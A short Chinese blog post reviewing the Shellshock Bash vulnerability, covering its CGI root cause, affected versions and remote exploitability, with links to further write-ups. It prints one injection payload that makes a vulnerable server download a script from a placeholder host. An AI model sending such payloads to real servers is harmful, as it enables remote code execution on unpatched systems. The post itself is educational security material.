shellshock漏洞回顧

review

  • 定位漏洞緣由
    部分大佬認爲uCGI技術的普及是個錯誤,正是因爲CGI技術的不合理之處,Shellshock纔有機可乘。
CGI技術是Web技術剛興起的時候發明的,它是最早的可以創建動態網頁內容的技術之一。它會把一個HTTP請求轉化爲一次shell調用。CGI (Common Gateway Interface),是一種基於瀏覽器的輸入,在Web服務器上運行程序的方法。
  • 風險預估

起初以爲這個僅僅是個本地執行的漏洞。後面發現亦可作爲遠程×××。

遠程×××面:正是由於後臺處理程序不僅僅可以用PHP、Python、Perl等腳本來接受請求、解釋執行、響應客戶端,當然還可以用Bash腳本來解釋執行用戶提交的GET或POST請求。

Bash漏洞其實是非常經典的“注入式×××”,也就是可以向 bash注入一段命令,從bash1.14 到4.3都存在這樣的漏洞。

() { :;}; wget http://www.XXX.com/testvul.sh

對於利用Bash腳本處理用戶請求的網站,×××者可以精心僞造數據,通過網絡傳到一臺服務器上,直接或間接觸發一個bash腳本,這樣就可以遠程執行惡意代碼。

通過特定格式的指令設置環境變量,進而在執行bash腳本時會先執行把我們設置的環境變量執行。

shellshock分析與回顧:
http://www.myhack58.com/Article/html/3/8/2014/54877_13.htm

shellshock真實案列:

http://www.freebuf.com/articles/system/45390.html

×××前提:必須得在有漏洞的機器上執行我們的bash代碼。

課程參考:
https://www.shiyanlou.com/courses/230

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章